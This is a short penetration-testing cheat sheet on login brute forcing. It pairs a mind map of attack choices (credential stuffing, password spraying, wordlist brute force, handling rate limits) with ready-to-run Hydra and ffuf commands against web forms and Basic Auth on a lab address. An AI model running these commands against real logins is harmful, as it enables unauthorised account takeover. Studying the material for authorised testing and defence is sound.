Login Brute Force Strategy

Attacking authentication mechanisms

Login Brute Forcing


Mind Map

graph TD
    A[Login Page] --> B[Identify Tech]
    B --> C{Attack Type}
    C --> D[Credential Stuffing]
    C --> E[Password Spraying]
    C --> F[Brute Force]
    D --> G[Known Breaches]
    E --> H[Common Passwords]
    F --> I[Wordlists]
    I --> J[Hydra/Burp]
    J --> K[Handle Rate Limits]
    K --> L[Success]

Quick Reference

Web Forms

hydra -l admin -P wordlist.txt 10.10.10.5 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid' # Brute force POST login form

Basic Auth

hydra -l admin -P wordlist.txt 10.10.10.5 http-get /admin # Brute force Basic Auth

Ffuf

ffuf -u http://10.10.10.5/login -X POST -d 'user=admin&pass=FUZZ' -w wordlist.txt -fc 401 # Brute force login with ffuf